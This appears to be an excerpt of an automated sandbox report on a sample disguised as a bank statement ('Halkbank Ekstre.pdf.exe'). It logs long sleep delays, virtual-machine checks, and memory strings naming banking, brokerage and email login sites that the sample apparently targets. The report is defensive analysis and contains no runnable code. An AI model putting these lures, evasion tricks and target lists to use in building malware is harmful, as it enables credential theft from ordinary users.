Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1212	Thread sleep count: 1982 > 30
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1212	Thread sleep count: 7873 > 30
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -599655s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -599296s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -599187s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -599076s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -598953s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -598843s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -598733s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -598624s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -598489s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -598287s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597796s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597577s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597358s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597249s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596921s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596702s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596590s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596468s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596355s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596234s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596124s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -596015s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595906s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595796s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595249s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595140s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -594921s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -594702s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -594593s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -594478s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -594374s >= -30000s
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016	Thread sleep time: -594265s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599670	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 599451	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598989	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598749	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598311	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598201	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596992	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596337	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 596184	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595999	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594249	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593921	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593812	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593703	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593593	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Thread delayed: delay time: 593484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599296
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599187
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 599076
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598953
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598843
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598733
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598624
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598489
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598287
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597577
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597358
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597249
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596702
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596590
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596468
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596355
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596124
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595796
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595249
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594702
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594478
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594374
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Thread delayed: delay time: 594265

Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2611677891.0000000001646000.00000004.00000020.00020000.00000000.sdmp, uAHDaCgpWpsogA.exe, 00000011.00000002.2606663692.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 0000000A.00000002.1526321296.000000000128D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ctio
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000045D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: uAHDaCgpWpsogA.exe, 00000011.00000002.2621637808.00000000042B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
